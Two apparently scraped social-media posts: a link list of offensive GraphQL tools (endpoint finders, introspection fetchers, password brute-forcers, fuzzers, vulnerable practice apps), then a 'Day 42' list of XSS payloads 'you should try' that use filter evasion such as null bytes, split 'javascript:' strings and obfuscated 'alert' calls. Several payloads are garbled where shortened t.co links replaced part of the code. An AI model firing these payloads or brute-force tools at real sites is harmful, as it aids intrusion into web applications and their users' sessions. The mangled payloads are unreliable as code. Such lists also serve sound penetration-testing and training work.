lu2ker

This is a list of Offensive GraphQL resources that i have found on my journey hopefully this info helps someone else as well OWWWWWW yip yip love yall This is my list of Offensive GraphQL information ## Offensive Security ### Discovery - [Graphinder](https://t.co/hLYBQYIllN) - Blazing fast GraphQL endpoints finder using subdomain enumeration, scripts analysis and bruteforce. - [Graphw00f](https://t.co/30MVmZPYVn) - GraphQL Server Engine Fingerprinting utility. - [Clairvoyance](https://t.co/ZkVaohYAqQ) - Patrial introspection fetcher when introspection is disabled. - [GraphQL Path Enum](https://t.co/2QkrcK6Plk) – Tool that lists the different ways of reaching a given type in a GraphQL schema. - [ShapeShifter](https://t.co/ukWkpt2EH4) - Schema extraction to JSON file with introspection. - [Goctopus](https://t.co/2uve5N6UNz) - a GraphQL endpoint discovery and fingerprinting tool. ### Exploitation - [GraphCrawler](https://t.co/wsGlCQuFQo) - A GraphQL automated security toolkit. Grab introspection, search for sensitive queries, and then test authorization. - [CrackQL](https://t.co/PiFjSEWk0j) - GraphQL password brute-force and fuzzing utility. - [GraphQLMap](https://t.co/seQx7EdGBB) - A scripting engine to interact with a GraphQL endpoint for pentesting purposes. - [https://t.co/H9E5qNpaz7](https://t.co/UHKdDsN3Mi) - One-click quick security scan of your GraphQL endpoints. Free, no login required. - [GraphQL Threat Matrix](https://t.co/mot6wxvnq7) - GraphQL threat framework to research security gaps in GraphQL implementations. - [InQL](https://t.co/N3OvmNN6oB) - A Burp Extension for GraphQL Security Testing. - [BatchQL](https://t.co/MCn4uxqtvr) - GraphQL security auditing script with a focus on performing batch GraphQL queries and mutations. - [GraphQL wordlist](https://t.co/zglp4J3mpg) - the only GraphQL wordlist for pentesting you'll ever need. Operations, field names, type names. It was collected on more than 60k distinct GraphQL schemas. ### Vulnerable Applications - [Damn Vulnerable GraphQL Application](https://t.co/3Sbk60Vf4k) - Damn Vulnerable GraphQL Application is an intentionally vulnerable implementation of Facebook's GraphQL technology, to learn and practice GraphQL Security. [POC GraphQL Application] https://t.co/M0Dv7u6ki5 [hackmegraph] https://t.co/8PyjsFI3mi [stack hawk] https://t.co/DwTwB3uSBH https://t.co/fSimsJjQFN

Daily Notes : Day 42 XSS Payload you should try !! <script>/&/-alert(1)</script> <script>/&amp;/-alert(1)</script> %00%00%00%00%00%00%00<script>alert(1)</script> (1.Null bytes are output 2.There is no space character immediately before) <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`"> <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click <script>https://t.co/BkmwUvO5ar(null,1)</script> (https://t.co/BkmwUvO5ar(%20, "XSS");) <script>https://t.co/YQAAB5wsJS(null,1)</script> <script>https://t.co/NZFMUonXGN(null,1)</script> <script>alert.apply(null, [1])</script>